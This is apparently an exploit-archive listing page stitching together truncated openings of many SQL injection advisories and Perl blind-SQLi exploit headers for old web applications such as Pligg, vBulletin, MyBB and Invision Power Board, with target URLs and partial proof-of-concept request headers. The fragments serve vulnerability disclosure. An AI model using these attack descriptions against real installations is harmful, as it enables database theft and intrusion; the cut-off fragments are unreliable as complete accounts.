Next Page >>
SQL Injection attack
List of found vulnerabilities
===============================================================================
1. Sql Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter "origmsg" is used in sql query
Preconditions:
Description:
Pligg is a popular open source, full featured, content management
system written in php. There are a number of vulnerabilities
within Pligg that allow for remote file enumeration, file inclusion,
cross site scripting, and sql injection. When combined these issues
allow for remote code execution on the affected installation
via arbitrary php code placed within template files once admin
credentials are gained via SQL Injection.
Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in the IceWarp WebMail Server. Attackers that are in
control of a user account for the web-based email and groupware
components are able to execute arbitrary SQL SELECT statements and
therefore read any data from the DBMS that are accessible by the Icewarp
eMail Server.
Summary
=======
The Management Center for Cisco Security Agents is affected by a
directory traversal vulnerability and a SQL injection vulnerability.
Successful exploitation of the directory traversal vulnerability may
allow an authenticated attacker to view and download arbitrary files
from the server hosting the Management Center. Successful
exploitation of the SQL injection vulnerability may allow an
authenticated attacker to execute SQL statements that can cause
#!/usr/bin/perl
#-----------------------------------------------------------------
#BLIND SQL INJECTION (GET var 'AlbumID')--RTWebalbum 1.0.462-->
#-----------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://rtwebalbum.x12.pl/
#-->DOWNLOAD: http://sourceforge.net/projects/rtwebalbum/
#-->DEMO: http://rtwebalbum.x12.pl/
- Severity: Moderately High
=============================================
I. VULNERABILITY
-------------------------
Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection
Invision Power Board <= 2.3.6 SQL Injection
II. BACKGROUND
-------------------------
Invision Power Board (IPB) is a professional forum system that has
CVE IDs in this security advisory:
1) Authentication bypass - CVE-2010-4279
2) OS Command Injection - CVE-2010-4278
3) SQL Injection - CVE-2010-4280
4) Blind SQL Injection - CVE-2010-4280
5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283
[+] Introduction
phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities
Name phpCollegeExchange
Vendor http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2009-12-11
#!/usr/bin/perl
#---------------------------------------------------
#BLIND SQL INJECTION EXPLOIT--TemaTres 1.0.3-->
#---------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.r020.com.ar/tematres/
#-->DOWNLOAD: http://sourceforge.net/projects/tematres/
#-->DEMO: http://www.r020.com.ar/tematres/index.php
#!/usr/bin/perl
#
#-------------------------------------------------
# (module custompage.php) BLIND SQL INJECTION
#-------------------------------------------------
#
# CMS INFORMATION:
#
#-->WEB: http://www.clantiger.com
#-->DOWNLOAD: http://www.clantiger.com/download-clan-cms
a) if webserver directory listing is enabled, then filename can be easily found
b) bruteforce is possible -> ~100 000 tries needed max for filename guessing
###############################################################################
4. SQL Injection in "includes/classes/searchbox.inc.php"
###############################################################################
Reason: failure to sufficiently sanitize user-supplied input data
Attack vector: user submitted GET parameter "max"
Preconditions:
# GulfTech Security Research August 18, 2008
##########################################################
# Vendor : Turnkey Web Tools, Inc
# URL : http://www.turnkeywebtools.com
# Version : SunShop <= 4.1.4
# Risk : SQL Injection
##########################################################
Description:
SunShop shopping cart is a full featured ecommerce solution written
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Pooya Site Builder (PSB) SQL Injection Vulnerabilities
# Vendor: www.paridel.com
# Vulnerable Version: 6.0 (Assembly Version)
# Exploit: Available
# Impact: High
# Fix: N/A
Released on: 2007/12/16
Changelog: 2007/12/16
Summary: [HT] Remote File Inclusion
[MT] SQL Injection
[MT] SQL Injection Protection Bypass
[__] Conclusion
Legend: L - Low risk M - Medium risk
H - High risk T - Tested
#!/usr/bin/perl
#
#
#------------------------------------------------------------------------------------------
#(GET var 'id') BLIND SQL INJECTION EXPLOIT --Dog Pedigree Online Database v1.0.1-Beta -->
#------------------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://thewhippetarchives.net/twa_is_offline.php
#-------
#
#Valid username
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/plugin.php?page=your_account.php&mode=passlost HTTP/1.1
#Host: [HOST]
#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
#------------
#
#magic quotes=OFF
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/index.php HTTP/1.1
#Host: [HOST]
#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
#
# CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3
#-->DORK: N/A
#-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT
#-->AFFECT VERSION: LAST = 1.2 BETA (Maybe <= ?)
#-->Discovered Bug date: 2009-04-20
#-->Reported Bug date: 2009-04-20
#-->Fixed bug date: Not fixed
#-->Info patch (????): Not fixed
[waraxe-2008-SA#069] - Multiple Sql Injection in vBulletin 3.7.4
===============================================================================
Author: Janek Vind "waraxe"
Date: 17. November 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-69.html
#!/usr/bin/perl
#-----------------------------------------------
#BLIND SQL INJECTION--Leap CMS 0.1.4-->
#-----------------------------------------------
#
# CMS INFORMATION:
#
#-->WEB: http://leap.gowondesigns.com/
#-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap
#-->CATEGORY: CMS / Lite
- Severity: 8.5/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
WP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities
II. BACKGROUND
-------------------------
WP-Forum is a discussion forum plugin for WordPress. It works with
WordPress 2+ version and PHP >= 5.0
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
II. DESCRIPTION
This CMS is affected by multiple remote security flaws,
such as SQL Injection, Arbitrary File upload, etc.
These security flaws DO NOT require authentication. Other
files may be vulnerable.
III. ANALYSIS
good example of this. Its impossible to account for all the ways a variable can be mangled once it
enters a program and if you Sanitize input when it first enters the program there will be cases where it
will become dangerous again. This isn't only a problem for SQLi, its also a problem for XSS. I am
inserting JS into the database, which isn't a vulnerablity, but printing it, is persistant XSS.
The blind sql injection is a bit strange. I can't use white space or commas, which is a pain. I had to
rewrite my general purpose Blind SQLi Class to accommodate. A binary search is used to greatly
speed up the blind sqli attack.
(which I also used in my php-nuke exploit: http://www.exploit-db.com/exploits/12510/)
Special thanks to Reiners for this sqli filter evasion cheat sheet:
multiple data acquisition methods, and user management features out of
the box".
II. DESCRIPTION
Multiple vulnerabilities exist in Cacti software (XSS, SQL Injection,
Path Disclosure, HTTP Response Splitting).
III. ANALYSIS
Summary:
[waraxe-2008-SA#062] - Multiple Sql Injections in MyBB 1.2.10
===============================================================================
Author: Janek Vind "waraxe"
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-62.html
1- [Remote Attacker] can login to hosting controller Panel. He can also change all others' passwords.
2- [User] can copy a file to hosting controller web directory which is executed under administrative privilege, so attacker can execute his commands by administrative privilege. e.g. an attacker can gain remote desktop of server using this bug and uploading an ASP file!
3- [Remote Attacker] can make a new user.
4- [Remote Attacker] can change all user's profiles.
5- [User] can see all the database information by a SQL injection.
6- [User] can change his credit amount or increase his discount.
7- [User] can uninstall other's FrontPage extensions.
8- [User] can delete all of gateway information.
9- [User] can enable or disable pay type.
10- [[User] can see all usernames in the server by "fp2000/NEWSRVR.asp".
_____________
Summary:
A) Multiple Remote Command Execution
B) Multiple SQL Injection
C) Multiple Blind SQL Injection
D) XSS
A) Multiple Remote Command Execution
Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities
Name Amblog
Vendor http://robitbt.hu
Versions Affected 1.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-10
Release Type: Co-ordinated, responsible disclosure
2. Vulnerability Information
----------------------------------------------------------------------------------------------
Class: SQL Injection, Insecure File Upload, Cross Site Scripting,
Filepath Disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
Next Page>>
|
